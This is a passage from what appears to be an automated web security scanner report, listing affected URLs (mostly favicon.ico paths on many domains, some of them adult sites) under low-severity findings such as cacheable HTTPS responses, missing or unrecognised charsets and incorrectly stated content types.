23.1439. http://www.tastymeatloafrecipes.com/favicon.ico

23.1440. http://www.tattooshoppers.com/favicon.ico

23.1441. http://www.teachnology.com/favicon.ico

23.1442. http://www.teacollection.com/favicon.ico

23.1443. http://www.teamspeed.com/favicon.ico

23.1444. http://www.technicaljobsearch.com/favicon.ico

23.1445. http://www.tecumsehpower.com/favicon.ico

23.1446. http://www.teenero.com/favicon.ico

23.1447. http://www.tellico4x4.com/favicon.ico

23.1448. http://www.teoriza.com/favicon.ico

23.1449. http://www.terrynazon.com/favicon.ico

23.1450. http://www.the-lawn-advisor.com/favicon.ico

23.1451. http://www.theallineed.com/favicon.ico

23.1452. http://www.theamericanmonk.com/favicon.ico

23.1453. http://www.theantiviruszero1.com/favicon.ico

23.1454. http://www.thebitbag.com/favicon.ico

23.1455. http://www.thebluegrassblog.com/favicon.ico

23.1456. http://www.thecentralvirginian.com/favicon.ico

23.1457. http://www.thecloakroomblog.com/favicon.ico

23.1458. http://www.thecoastalsource.com/favicon.ico

23.1459. http://www.thecoastercritic.com/favicon.ico

23.1460. http://www.thedailyaztec.com/favicon.ico

23.1461. http://www.thedailytail.com/favicon.ico

23.1462. http://www.thedailyworld.com/favicon.ico

23.1463. http://www.thedigitel.com/favicon.ico

23.1464. http://www.thefannetwork.org/favicon.ico

23.1465. http://www.thefuelantivirus.com/favicon.ico

23.1466. http://www.thegunzone.com/favicon.ico

23.1467. http://www.thehealthcarecenter.com/favicon.ico

23.1468. http://www.theherbsplace.com/favicon.ico

23.1469. http://www.thehogs.net/favicon.ico

23.1470. http://www.thehoodnerd.com/favicon.ico

23.1471. http://www.thelancet.com/favicon.ico

23.1472. http://www.thelaw.com/favicon.ico

23.1473. http://www.thelawnmower.info/favicon.ico

23.1474. http://www.thelightbeyond.com/favicon.ico

23.1475. http://www.theliteracysite.com/favicon.ico

23.1476. http://www.themonroetimes.com/favicon.ico

23.1477. http://www.themyselftrainer.com/favicon.ico

23.1478. http://www.therapistunlimited.com/favicon.ico

23.1479. http://www.thesaabsite.com/favicon.ico

23.1480. http://www.thesitewizard.com/favicon.ico

23.1481. http://www.thesouthmission.com/favicon.ico

23.1482. http://www.thestatecolumn.com/favicon.ico

23.1483. http://www.thestudentroom.co.uk/favicon.ico

23.1484. http://www.thethriftycouple.com/favicon.ico

23.1485. http://www.thetradersden.org/favicon.ico

23.1486. http://www.thewebcomiclist.com/favicon.ico

23.1487. http://www.thewesterlysun.com/favicon.ico

23.1488. http://www.thompsonspeedway.com/favicon.ico

23.1489. http://www.thoughts-about-god.com/favicon.ico

23.1490. http://www.three-survey.com/favicon.ico

23.1491. http://www.threestooges.com/favicon.ico

23.1492. http://www.thriftyvet.com/favicon.ico

23.1493. http://www.thrillnetwork.com/favicon.ico

23.1494. http://www.ticketturbo.com/favicon.ico

23.1495. http://www.timesleaderautos.com/favicon.ico

23.1496. http://www.timetospa.com/favicon.ico

23.1497. http://www.timothysykes.com/favicon.ico

23.1498. http://www.tineye.com/favicon.ico

23.1499. http://www.tires-wholesale.com/favicon.ico

23.1500. http://www.tnonline.com/favicon.ico

23.1501. http://www.toolsource.com/favicon.ico

23.1502. http://www.top-health-site.com/favicon.ico

23.1503. http://www.top-ppc.com/favicon.ico

23.1504. http://www.topagentquest.com/favicon.ico

23.1505. http://www.topclassactions.com/favicon.ico

23.1506. http://www.toryburch.com/favicon.ico

23.1507. http://www.tothecenter.com/favicon.ico

23.1508. http://www.tottenhamhotspur.com/favicon.ico

23.1509. http://www.touchlocal.com/favicon.ico

23.1510. http://www.toughpigs.com/favicon.ico

23.1511. http://www.tpgrewards.com/favicon.ico

23.1512. http://www.trackclk.com/favicon.ico

23.1513. http://www.trackfu.com/favicon.ico

23.1514. http://www.trade2finance.com/favicon.ico

23.1515. http://www.tradopoly.com/favicon.ico

23.1516. http://www.traffcash.biz/favicon.ico

23.1517. http://www.trail-gear.com/favicon.ico

23.1518. http://www.trainpackages.ca/favicon.ico

23.1519. http://www.trainweb.com/favicon.ico

23.1520. http://www.travelersdigest.com/favicon.ico

23.1521. http://www.traviangames.com/favicon.ico

23.1522. http://www.treca.org/favicon.ico

23.1523. http://www.tremcoinc.com/favicon.ico

23.1524. http://www.trends-search.com/favicon.ico

23.1525. http://www.tripadvisor.fr/favicon.ico

23.1526. http://www.tripadvisor.ie/favicon.ico

23.1527. http://www.trussel.com/favicon.ico

23.1528. http://www.trusted-forwarder.org/favicon.ico

23.1529. http://www.trusteddietreviews.org/favicon.ico

23.1530. http://www.trustetc.com/favicon.ico

23.1531. http://www.tscpl.org/favicon.ico

23.1532. http://www.tsday.com/favicon.ico

23.1533. http://www.tsikot.com/favicon.ico

23.1534. http://www.ttuhsc.edu/favicon.ico

23.1535. http://www.tubal-reversal.net/favicon.ico

23.1536. http://www.tubalicious.com/favicon.ico

23.1537. http://www.tudiscoverykids.com/favicon.ico

23.1538. http://www.tuenti.com/favicon.ico

23.1539. http://www.tumblebooks.com/favicon.ico

23.1540. http://www.tumbleweedrestaurants.com/favicon.ico

23.1541. http://www.turbodieselregister.com/favicon.ico

23.1542. http://www.turntoislam.com/favicon.ico

23.1543. http://www.tv5.org/favicon.ico

23.1544. http://www.tvfool.com/favicon.ico

23.1545. http://www.tvjane.com/favicon.ico

23.1546. http://www.twinkietown.com/favicon.ico

23.1547. http://www.twomenandatruck.com/favicon.ico

23.1548. http://www.ubeautyportal.com/favicon.ico

23.1549. http://www.uberreview.com/favicon.ico

23.1550. http://www.uiccu.org/favicon.ico

23.1551. http://www.ultimatesongwriting.com/favicon.ico

23.1552. http://www.uma.edu/favicon.ico

23.1553. http://www.ummah.com/favicon.ico

23.1554. http://www.undispatch.com/favicon.ico

23.1555. http://www.unimelb.edu.au/favicon.ico

23.1556. http://www.uniquephoto.com/favicon.ico

23.1557. http://www.unitedpartsupply.com/favicon.ico

23.1558. http://www.universoulcircus.com/favicon.ico

23.1559. http://www.unrealitytv.co.uk/favicon.ico

23.1560. http://www.updrivers.com/favicon.ico

23.1561. http://www.uppercaseliving.net/favicon.ico

23.1562. http://www.usa-paydayassistance.net/favicon.ico

23.1563. http://www.usacash--alliance.com/favicon.ico

23.1564. http://www.usagold.com/favicon.ico

23.1565. http://www.usaopinionpanel.com/favicon.ico

23.1566. http://www.usatoolwarehouse.com/favicon.ico

23.1567. http://www.usba.com/favicon.ico

23.1568. http://www.usboatsupply.com/favicon.ico

23.1569. http://www.usd345.com/favicon.ico

23.1570. http://www.usouthal.edu/favicon.ico

23.1571. http://www.uspo.com/favicon.ico

23.1572. http://www.ussoccer.com/favicon.ico

23.1573. http://www.ustronics.com/favicon.ico

23.1574. http://www.utilityboardsupply.com/favicon.ico

23.1575. http://www.utro.ru/favicon.ico

23.1576. http://www.uv.es/favicon.ico

23.1577. http://www.uwinnipeg.ca/favicon.ico

23.1578. http://www.valubuild.net/favicon.ico

23.1579. http://www.valvoline.com/favicon.ico

23.1580. http://www.vampirerave.com/favicon.ico

23.1581. http://www.varian.com/favicon.ico

23.1582. http://www.vdopia.com/favicon.ico

23.1583. http://www.vectroave.com/favicon.ico

23.1584. http://www.vegassports-odds.com/favicon.ico

23.1585. http://www.vermonttoday.com/favicon.ico

23.1586. http://www.versuscountrybagamonsterbuck.com/favicon.ico

23.1587. http://www.vertigosecurity.com/favicon.ico

23.1588. http://www.very-clever.com/favicon.ico

23.1589. http://www.villageofjoy.com/favicon.ico

23.1590. http://www.villagetours.net/favicon.ico

23.1591. http://www.vinography.com/favicon.ico

23.1592. http://www.vintageadsandstuff.com/favicon.ico

23.1593. http://www.vintageprojects.com/favicon.ico

23.1594. http://www.vintagesynth.com/favicon.ico

23.1595. http://www.vintagethumbnails.com/favicon.ico

23.1596. http://www.visi.com/favicon.ico

23.1597. http://www.visitdeepcreek.com/favicon.ico

23.1598. http://www.visitnj.org/favicon.ico

23.1599. http://www.visitpensacola.com/favicon.ico

23.1600. http://www.visitsaltlake.com/favicon.ico

23.1601. http://www.vitabot.com/favicon.ico

23.1602. http://www.vivalasvegasweddings.com/favicon.ico

23.1603. http://www.vivirlatino.com/favicon.ico

23.1604. http://www.vnet.cn/favicon.ico

23.1605. http://www.voicenews.com/favicon.ico

23.1606. http://www.volgistics.com/favicon.ico

23.1607. http://www.vsu.edu/favicon.ico

23.1608. http://www.vwc.edu/favicon.ico

23.1609. http://www.wahonline.com/favicon.ico

23.1610. http://www.wakeboarder.com/favicon.ico

23.1611. http://www.wallpapersonweb.com/favicon.ico

23.1612. http://www.wandtv.com/favicon.ico

23.1613. http://www.wannasmile.com/favicon.ico

23.1614. http://www.washfm.com/favicon.ico

23.1615. http://www.water-retention.net/favicon.ico

23.1616. http://www.waterwizz.com/favicon.ico

23.1617. http://www.watfordoutlet.com/favicon.ico

23.1618. http://www.wbez.org/favicon.ico

23.1619. http://www.wdmcs.org/favicon.ico

23.1620. http://www.weallwantsomeone.org/favicon.ico

23.1621. http://www.weapons-universe.com/favicon.ico

23.1622. http://www.weaselzippers.us/favicon.ico

23.1623. http://www.weatherinstruments.com/favicon.ico

23.1624. http://www.webchicklet.com/favicon.ico

23.1625. http://www.webclassifieds.us/favicon.ico

23.1626. http://www.webfooted.net/favicon.ico

23.1627. http://www.webkinzinsider.com/favicon.ico

23.1628. http://www.webrats.com/favicon.ico

23.1629. http://www.webtvlist.com/favicon.ico

23.1630. http://www.wedding53.com/favicon.ico

23.1631. http://www.weddingdecor.com/favicon.ico

23.1632. http://www.weddingfavorsunlimited.com/favicon.ico

23.1633. http://www.wedi.de/favicon.ico

23.1634. http://www.weird-websites.info/favicon.ico

23.1635. http://www.welcomehome.org/favicon.ico

23.1636. http://www.weny.com/favicon.ico

23.1637. http://www.werelate.org/favicon.ico

23.1638. http://www.westernshirts.com/favicon.ico

23.1639. http://www.westmorelandfair.com/favicon.ico

23.1640. http://www.wetsuitwearhouse.com/favicon.ico

23.1641. http://www.whathealth.com/favicon.ico

23.1642. http://www.whiteguarderonline.com/favicon.ico

23.1643. http://www.whitehouse.com/favicon.ico

23.1644. http://www.whoi.edu/favicon.ico

23.1645. http://www.whopassedon.com/favicon.ico

23.1646. http://www.whyquit.com/favicon.ico

23.1647. http://www.wiichat.com/favicon.ico

23.1648. http://www.wikapedia.com/favicon.ico

23.1649. http://www.wikipatents.com/favicon.ico

23.1650. http://www.windandweather.com/favicon.ico

23.1651. http://www.wirelessgalaxy.com/favicon.ico

23.1652. http://www.wisesnacks.com/favicon.ico

23.1653. http://www.wlns.com/favicon.ico

23.1654. http://www.wmicentral.com/favicon.ico

23.1655. http://www.wmj.ru/favicon.ico

23.1656. http://www.wmji.com/favicon.ico

23.1657. http://www.wmta.org/favicon.ico

23.1658. http://www.wokv.com/favicon.ico

23.1659. http://www.wolffurniture.com/favicon.ico

23.1660. http://www.woodstove.com/favicon.ico

23.1661. http://www.wooey.com/favicon.ico

23.1662. http://www.wordtemplates.org/favicon.ico

23.1663. http://www.workforceexplorer.com/favicon.ico

23.1664. http://www.workingpoint.com/favicon.ico

23.1665. http://www.worldgallery.co.uk/favicon.ico

23.1666. http://www.worldnewsheardnow.com/favicon.ico

23.1667. http://www.worldofoutlaws.com/favicon.ico

23.1668. http://www.worldwideworkathome.com/favicon.ico

23.1669. http://www.wqed.org/favicon.ico

23.1670. http://www.wrapcandy.com/favicon.ico

23.1671. http://www.wrestling-edge.com/favicon.ico

23.1672. http://www.writtenmelodies.com/favicon.ico

23.1673. http://www.wrm6.com/favicon.ico

23.1674. http://www.wvnstv.com/favicon.ico

23.1675. http://www.wzronline.com/favicon.ico

23.1676. http://www.xb-online.com/favicon.ico

23.1677. http://www.xlforum.net/favicon.ico

23.1678. http://www.xmaduras.com/favicon.ico

23.1679. http://www.xmature-vids.com/favicon.ico

23.1680. http://www.xmaturetubes.com/favicon.ico

23.1681. http://www.xpmedia.com/favicon.ico

23.1682. http://www.xsbb.nl/favicon.ico

23.1683. http://www.xtshare.com/favicon.ico

23.1684. http://www.xvoe.net/favicon.ico

23.1685. http://www.yankeeairmuseum.org/favicon.ico

23.1686. http://www.yccd.edu/favicon.ico

23.1687. http://www.ydesigns.biz/favicon.ico

23.1688. http://www.yeahpot.com/favicon.ico

23.1689. http://www.ymcarockies.org/favicon.ico

23.1690. http://www.ymlp28.com/favicon.ico

23.1691. http://www.yogabbagabba.com/favicon.ico

23.1692. http://www.yokogames.com/favicon.ico

23.1693. http://www.yorkpress.co.uk/favicon.ico

23.1694. http://www.yougamers.com/favicon.ico

23.1695. http://www.yourlawyer.com/favicon.ico

23.1696. http://www.yuni.com/favicon.ico

23.1697. http://www.zambooie.com/favicon.ico

23.1698. http://www.zbattery.com/favicon.ico

23.1699. http://www.zdf.de/favicon.ico

23.1700. http://www.zeroantivirus.com/favicon.ico

23.1701. http://www.zidaho.com/favicon.ico

23.1702. http://www.ziploctasteofhome-digital.com/favicon.ico

23.1703. http://www.zone8cycling.com/favicon.ico

23.1704. http://www.zrxoa.org/favicon.ico

23.1705. http://www.zukiworld.com/favicon.ico

23.1706. http://www.zvezdi.ru/favicon.ico

23.1707. http://www.zvoxaudio.com/favicon.ico

24. Cacheable HTTPS response

24.1. https://desire2learn.uww.edu/

24.2. https://password.uww.edu/IDMProv/themebrand/Neptune/Neptune_H_copy.png

24.3. https://password.uww.edu/IDMProv/themebrand/Neptune/favicon.ico

24.4. https://uwwins.uww.edu/uwwins/signon.html

25. HTML does not specify charset

25.1. http://tickets.spac.org/

25.2. https://uwwins.uww.edu/uwwins/signon.html

25.3. http://www.1045thezone.com/favicon.ico

25.4. http://www.1888932-2946.ws/favicon.ico

25.5. http://www.2cnd.com/favicon.ico

25.6. http://www.aath.org/favicon.ico

25.7. http://www.about-liposuction-in-beverly-hills.info/favicon.ico

25.8. http://www.adamevestores.com/favicon.ico

25.9. http://www.adaycare.com/favicon.ico

25.10. http://www.adpv.com/favicon.ico

25.11. http://www.aglife.com/favicon.ico

25.12. http://www.airsoftretreat.com/favicon.ico

25.13. http://www.allcwd.com/favicon.ico

25.14. http://www.alotarubberstamps.com/favicon.ico

25.15. http://www.amateurdating.net/favicon.ico

25.16. http://www.amexpubbooks.com/favicon.ico

25.17. http://www.angusonline.org/favicon.ico

25.18. http://www.apeainthepod.com/favicon.ico

25.19. http://www.apinchof.com/favicon.ico

25.20. http://www.ascycles.com/favicon.ico

25.21. http://www.asdusc.com/favicon.ico

25.22. http://www.asian-anal.org/favicon.ico

25.23. http://www.atozautolights.com/favicon.ico

25.24. http://www.audio-video-furniture.com/favicon.ico

25.25. http://www.aurorahistoryboutique.com/favicon.ico

25.26. http://www.autoscout24.es/favicon.ico

25.27. http://www.babes-x.com/favicon.ico

25.28. http://www.beach-fun.com/favicon.ico

25.29. http://www.bestpeoplesearch.com/favicon.ico

25.30. http://www.bigbear.com/favicon.ico

25.31. http://www.bigeye.com/favicon.ico

25.32. http://www.bizquest.com/favicon.ico

25.33. http://www.blizzardguides.com/favicon.ico

25.34. http://www.blogo.it/favicon.ico

25.35. http://www.bothsidesofthetable.com/favicon.ico

25.36. http://www.bradleyschools.org/favicon.ico

25.37. http://www.breastimplants411.com/favicon.ico

25.38. http://www.brookhavencollege.edu/favicon.ico

25.39. http://www.bulliondirect.com/favicon.ico

25.40. http://www.byutv.org/favicon.ico

25.41. http://www.candid-shiny.com/favicon.ico

25.42. http://www.caramelebony.com/favicon.ico

25.43. http://www.carfaxonline.com/favicon.ico

25.44. http://www.caribbeangfx.com/favicon.ico

25.45. http://www.cccev.com/favicon.ico

25.46. http://www.celebros.com/favicon.ico

25.47. http://www.centralwisconsinstatefair.com/favicon.ico

25.48. http://www.chacousa.com/favicon.ico

25.49. http://www.chamberlain.edu/favicon.ico

25.50. http://www.chandleraz.gov/favicon.ico

25.51. http://www.chatstat.com/favicon.ico

25.52. http://www.chiltonlibrary.com/favicon.ico

25.53. http://www.chitchatting.com/favicon.ico

25.54. http://www.chryslerdealer.com/favicon.ico

25.55. http://www.citysports.com/favicon.ico

25.56. http://www.clipsgrabber.com/favicon.ico

25.57. http://www.coastline.edu/favicon.ico

25.58. http://www.coffesshopreadin.com/favicon.ico

25.59. http://www.collectors.com/favicon.ico

25.60. http://www.computerdesksnmore.com/favicon.ico

25.61. http://www.connerprairie.org/favicon.ico

25.62. http://www.creditcard-loan-me.com/favicon.ico

25.63. http://www.crossdresser.com/favicon.ico

25.64. http://www.crossroadsrv.com/favicon.ico

25.65. http://www.csccredit.com/favicon.ico

25.66. http://www.cumonhairy.com/favicon.ico

25.67. http://www.daelive.com/favicon.ico

25.68. http://www.dailyadvance.com/favicon.ico

25.69. http://www.dancehelp.com/favicon.ico

25.70. http://www.datavis.com/favicon.ico

25.71. http://www.davenport.edu/favicon.ico

25.72. http://www.dcsportsfan.com/favicon.ico

25.73. http://www.dealerinventoryonline.com/favicon.ico

25.74. http://www.decoruniverse.com/favicon.ico

25.75. http://www.desktopreview.com/favicon.ico

25.76. http://www.directgardening.com/favicon.ico

25.77. http://www.dogthebountyhunter.com/favicon.ico

25.78. http://www.drivepetty.com/favicon.ico

25.79. http://www.eacourier.com/favicon.ico

25.80. http://www.eacu.org/favicon.ico

25.81. http://www.ebook3000.com/favicon.ico

25.82. http://www.edd.com/favicon.ico

25.83. http://www.ehamne.com/favicon.ico

25.84. http://www.esc11.net/favicon.ico

25.85. http://www.evvet.org/favicon.ico

25.86. http://www.expresshunt.com/favicon.ico

25.87. http://www.ezcouponsearch.com/favicon.ico

25.88. http://www.fakes-celebs.com/favicon.ico

25.89. http://www.fangraphs.com/favicon.ico

25.90. http://www.fileflyer.com/favicon.ico

25.91. http://www.findacase.com/favicon.ico

25.92. http://www.fipreban.com/favicon.ico

25.93. http://www.flashmaps.com/favicon.ico

25.94. http://www.free-celebritymoviearchive.com/favicon.ico

25.95. http://www.freeasiananal.net/favicon.ico

25.96. http://www.freetypedefender4.com/favicon.ico

25.97. http://www.freshgrandmatube.com/favicon.ico

25.98. http://www.friskymamas.com/favicon.ico

25.99. http://www.fsckmeet.com/favicon.ico

25.100. http://www.fundrinkingames.com/favicon.ico

25.101. http://www.funmaza.com/favicon.ico

25.102. http://www.fxstreet.com/favicon.ico

25.103. http://www.gameattraction.net/favicon.ico

25.104. http://www.gameroccupation.com/favicon.ico

25.105. http://www.glamourupskirt.com/favicon.ico

25.106. http://www.globelifechildren.com/favicon.ico

25.107. http://www.godofhairy.com/favicon.ico

25.108. http://www.golfholiday.com/favicon.ico

25.109. http://www.golfweb.ws/1/

25.110. http://www.golfweb.ws/1/%7B6246aa39-6588-4444-891c-d9da585f4e9d%7D.htm

25.111. http://www.golfweb.ws/1/%7Bc2a820fc-3ba8-43f6-0ab6-9fb21ba19283%7D.htm

25.112. http://www.golfweb.ws/1/menu.htm

25.113. http://www.gospial.com/favicon.ico

25.114. http://www.gothicdatelink.com/favicon.ico

25.115. http://www.gov.im/favicon.ico

25.116. http://www.gradespeed.net/favicon.ico

25.117. http://www.great-workout.com/favicon.ico

25.118. http://www.greatsaver29.com/favicon.ico

25.119. http://www.gynogalleries.com/favicon.ico

25.120. http://www.hairydivastgp.com/favicon.ico

25.121. http://www.hairygirlband.com/favicon.ico

25.122. http://www.halfprice.com/favicon.ico

25.123. http://www.hammondstar.com/favicon.ico

25.124. http://www.havahart.com/favicon.ico

25.125. http://www.helloboston.com/favicon.ico

25.126. http://www.hellonashville.com/favicon.ico

25.127. http://www.hellopittsburgh.com/favicon.ico

25.128. http://www.hickoksports.com/favicon.ico

25.129. http://www.highline.edu/favicon.ico

25.130. http://www.holyfragger.com/favicon.ico

25.131. http://www.hotggirls.com/favicon.ico

25.132. http://www.hotmom-and-daughter.com/favicon.ico

25.133. http://www.houseneeds.com/favicon.ico

25.134. http://www.howtowritearesume.net/favicon.ico

25.135. http://www.hw.net/favicon.ico

25.136. http://www.hyperfound.com/favicon.ico

25.137. http://www.hypster.com/favicon.ico

25.138. http://www.ihirechefs.com/favicon.ico

25.139. http://www.ihirehr.com/favicon.ico

25.140. http://www.ihiremedtechs.com/favicon.ico

25.141. http://www.ihiresecurity.com/favicon.ico

25.142. http://www.ilovetwinks.net/favicon.ico

25.143. http://www.incentiveusa.com/favicon.ico

25.144. http://www.inetvideo.com/favicon.ico

25.145. http://www.insuranceleads.com/favicon.ico

25.146. http://www.insuremeonline.com/favicon.ico

25.147. http://www.intermediaoutdoors.com/favicon.ico

25.148. http://www.japaneseholes.com/favicon.ico

25.149. http://www.jobinthebox.com/favicon.ico

25.150. http://www.jtcc.edu/favicon.ico

25.151. http://www.kiewit.com/favicon.ico

25.152. http://www.kissasylum.com/favicon.ico

25.153. http://www.kissfunny.com/favicon.ico

25.154. http://www.laborlawcenter.com/favicon.ico

25.155. http://www.ladyboyfromthai.com/favicon.ico

25.156. http://www.lakegeorge.com/favicon.ico

25.157. http://www.lakesunbank.com/favicon.ico

25.158. http://www.lbloom.net/favicon.ico

25.159. http://www.leaguesecretary.com/favicon.ico

25.160. http://www.liberty-tree.ca/favicon.ico

25.161. http://www.linkbuzzters.com/favicon.ico

25.162. http://www.liuna.org/favicon.ico

25.163. http://www.loehmanns.com/favicon.ico

25.164. http://www.lorenz.com/favicon.ico

25.165. http://www.madametussauds.com/favicon.ico

25.166. http://www.mahoningcountyoh.gov/favicon.ico

25.167. http://www.manhattanbirdclub.com/favicon.ico

25.168. http://www.martinsfood.com/favicon.ico

25.169. http://www.maturegonewild.net/favicon.ico

25.170. http://www.mcamateurs.com/favicon.ico

25.171. http://www.merrygranny.com/favicon.ico

25.172. http://www.messenger-inquirer.com/favicon.ico

25.173. http://www.mininggazette.com/favicon.ico

25.174. http://www.mlmfly.com/favicon.ico

25.175. http://www.mobileballot.com/favicon.ico

25.176. http://www.modernbike.com/favicon.ico

25.177. http://www.mouseonhouse.com/favicon.ico

25.178. http://www.mscmain.com/favicon.ico

25.179. http://www.mshsaa.org/favicon.ico

25.180. http://www.muddywaterpress.com/favicon.ico

25.181. http://www.myfoxlubbock.com/favicon.ico

25.182. http://www.myhairydolls.com/favicon.ico

25.183. http://www.myhomemadevids.com/favicon.ico

25.184. http://www.myimager.com/favicon.ico

25.185. http://www.mylovecal.com/favicon.ico

25.186. http://www.myrealty.com/favicon.ico

25.187. http://www.namesandnumbers.com/favicon.ico

25.188. http://www.nccommerce.com/favicon.ico

25.189. http://www.neighborforneighbor.org/favicon.ico

25.190. http://www.netscrap.com/favicon.ico

25.191. http://www.newagestore.com/favicon.ico

25.192. http://www.newconnections-cancer.org/favicon.ico

25.193. http://www.newschannel34.com/favicon.ico

25.194. http://www.ngk.com/favicon.ico

25.195. http://www.nitrocircus.com/favicon.ico

25.196. http://www.nls.org/favicon.ico

25.197. http://www.nothanksonline.com/favicon.ico

25.198. http://www.nptelegraph.com/favicon.ico

25.199. http://www.office2office.com/favicon.ico

25.200. http://www.oldyounghotel.com/favicon.ico

25.201. http://www.orconhosting.net.nz/favicon.ico

25.202. http://www.orgill.com/favicon.ico

25.203. http://www.osaa.org/favicon.ico

25.204. http://www.pantherst.net/favicon.ico

25.205. http://www.pba.com/favicon.ico

25.206. http://www.phonedetective.com/favicon.ico

25.207. http://www.piedmontng.com/favicon.ico

25.208. http://www.pillsburystore.com/favicon.ico

25.209. http://www.postescanada.ca/favicon.ico

25.210. http://www.premium-home-realtors.com/favicon.ico

25.211. http://www.primechoiceautoparts.com/favicon.ico

25.212. http://www.prodirectsoccer.com/favicon.ico

25.213. http://www.protectyourhome.com/favicon.ico

25.214. http://www.psoriasisanswers.com/favicon.ico

25.215. http://www.purestorm.com/favicon.ico

25.216. http://www.quiltville.com/favicon.ico

25.217. http://www.racetrac.com/favicon.ico

25.218. http://www.rainbow.com/favicon.ico

25.219. http://www.rape4free.com/favicon.ico

25.220. http://www.read-4-cash.com/favicon.ico

25.221. http://www.readingclubos.com/favicon.ico

25.222. http://www.reaganfoundation.org/favicon.ico

25.223. http://www.regency-fire.com/favicon.ico

25.224. http://www.remax-michigan.com/favicon.ico

25.225. http://www.remax-midstates.com/favicon.ico

25.226. http://www.rentdigs.com/favicon.ico

25.227. http://www.replyat.com/favicon.ico

25.228. http://www.respect-the-book.org/favicon.ico

25.229. http://www.restaurant-guide.com/favicon.ico

25.230. http://www.resultcrawler.com/favicon.ico

25.231. http://www.resultfull.com/favicon.ico

25.232. http://www.resultspile.com/favicon.ico

25.233. http://www.rmauctions.com/favicon.ico

25.234. http://www.roadandtravel.com/favicon.ico

25.235. http://www.roanokeciviccenter.com/favicon.ico

25.236. http://www.rockymounttelegram.com/favicon.ico

25.237. http://www.rqriley.com/favicon.ico

25.238. http://www.samsfurniture.com/favicon.ico

25.239. http://www.santabarbara.com/favicon.ico

25.240. http://www.sccaforums.com/favicon.ico

25.241. http://www.sci-fi-3d.com/favicon.ico

25.242. http://www.sciremc.com/favicon.ico

25.243. http://www.sdbor.edu/favicon.ico

25.244. http://www.secondchancedegrees.com/favicon.ico

25.245. http://www.sharmusic.com/favicon.ico

25.246. http://www.silvercloudsoftware.com/favicon.ico

25.247. http://www.silversneakers.com/favicon.ico

25.248. http://www.simplesite.com/favicon.ico

25.249. http://www.siteimpressions.net/favicon.ico

25.250. http://www.sitraders.com/favicon.ico

25.251. http://www.sky.it/favicon.ico

25.252. http://www.skyscape.com/favicon.ico

25.253. http://www.smarthunt.com/favicon.ico

25.254. http://www.smsd.org/favicon.ico

25.255. http://www.snapforseniors.com/favicon.ico

25.256. http://www.speedwaymedia.com/favicon.ico

25.257. http://www.sps.edu/favicon.ico

25.258. http://www.standardprocess.com/favicon.ico

25.259. http://www.standardpub.com/favicon.ico

25.260. http://www.startrekonline.com/favicon.ico

25.261. http://www.stategov.org/favicon.ico

25.262. http://www.stenhouse.com/favicon.ico

25.263. http://www.stockegg.com/favicon.ico

25.264. http://www.stocking-tube.com/favicon.ico

25.265. http://www.streamlight.com/favicon.ico

25.266. http://www.supercasuals.com/favicon.ico

25.267. http://www.supplierlist.com/favicon.ico

25.268. http://www.svec-online.coop/favicon.ico

25.269. http://www.swifthunt.com/favicon.ico

25.270. http://www.tallshipwindy.com/favicon.ico

25.271. http://www.teeines.com/favicon.ico

25.272. http://www.theamcforum.com/favicon.ico

25.273. http://www.thecashteacher.com/favicon.ico

25.274. http://www.thecoastalsource.com/favicon.ico

25.275. http://www.theignitionnetwork.com/favicon.ico

25.276. http://www.thememoryguide.com/favicon.ico

25.277. http://www.themonroetimes.com/favicon.ico

25.278. http://www.theresultpile.com/favicon.ico

25.279. http://www.thetiebar.com/favicon.ico

25.280. http://www.thetotaltransformation.com/favicon.ico

25.281. http://www.thumbshots.com/favicon.ico

25.282. http://www.tirewarehouse.net/favicon.ico

25.283. http://www.top-foods.com/favicon.ico

25.284. http://www.toyotaquality.com/favicon.ico

25.285. http://www.trcc.edu/favicon.ico

25.286. http://www.treca.org/favicon.ico

25.287. http://www.tuenti.com/favicon.ico

25.288. http://www.twinks-boys-world.com/favicon.ico

25.289. http://www.ultimateberries.com/favicon.ico

25.290. http://www.unsubnow.com/favicon.ico

25.291. http://www.unusualhotelsoftheworld.com/favicon.ico

25.292. http://www.uominivideo.com/favicon.ico

25.293. http://www.updrivers.com/favicon.ico

25.294. http://www.valubuild.net/favicon.ico

25.295. http://www.valuhomecenters.com/favicon.ico

25.296. http://www.victorpest.com/favicon.ico

25.297. http://www.videodome.com/favicon.ico

25.298. http://www.vidzguide.com/favicon.ico

25.299. http://www.viva-media.com/favicon.ico

25.300. http://www.vlcmediaplayer-new.info/favicon.ico

25.301. http://www.vnet.cn/favicon.ico

25.302. http://www.voicenews.com/favicon.ico

25.303. http://www.vsu.edu/favicon.ico

25.304. http://www.washingtonlakes.com/favicon.ico

25.305. http://www.watch-inuyasha.com/favicon.ico

25.306. http://www.watchsologirls.com/favicon.ico

25.307. http://www.water.net/favicon.ico

25.308. http://www.wikapedia.com/favicon.ico

25.309. http://www.wincfg.org/favicon.ico

25.310. http://www.wolffurniture.com/favicon.ico

25.311. http://www.xmlsweb.com/favicon.ico

25.312. http://www.xvoe.net/favicon.ico

25.313. http://www.yousearchpage.com/favicon.ico

25.314. http://www.ziploctasteofhome-digital.com/favicon.ico

25.315. http://www.zoocoupon.com/favicon.ico

26. HTML uses unrecognised charset

26.1. http://www.21cn.com/favicon.ico

26.2. http://www.ationnet.com/favicon.ico

26.3. http://www.evobill.biz/favicon.ico

26.4. http://www.firsttoserve.com/favicon.ico

26.5. http://www.ips.com.cn/favicon.ico

26.6. http://www.jino-net.ru/favicon.ico

26.7. http://www.protrafv2.com/favicon.ico

26.8. http://www.randleclips.com/favicon.ico

26.9. http://www.vickyclips.com/favicon.ico

27. Content type incorrectly stated

27.1. http://www.1045thezone.com/favicon.ico

27.2. http://www.1888932-2946.ws/favicon.ico

27.3. http://www.2cnd.com/favicon.ico

27.4. http://www.acesewvac.com/favicon.ico

27.5. http://www.adamevestores.com/favicon.ico

27.6. http://www.adpv.com/favicon.ico

27.7. http://www.aircarecolorado.com/favicon.ico

27.8. http://www.angusonline.org/favicon.ico

27.9. http://www.annaboveembroidery.com/favicon.ico

27.10. http://www.appscout.com/favicon.ico

27.11. http://www.arcadja.com/favicon.ico

27.12. http://www.architecturaldepot.com/favicon.ico

27.13. http://www.ascycles.com/favicon.ico

27.14. http://www.atozautolights.com/favicon.ico

27.15. http://www.aurorahistoryboutique.com/favicon.ico

27.16. http://www.authenticwatches.com/favicon.ico

27.17. http://www.autoscout24.es/favicon.ico

27.18. http://www.beach-fun.com/favicon.ico

27.19. http://www.bestdressedchild.com/favicon.ico

27.20. http://www.bestpeoplesearch.com/favicon.ico

27.21. http://www.bibleco.com/favicon.ico

27.22. http://www.bigbear.com/favicon.ico

27.23. http://www.bizquest.com/favicon.ico

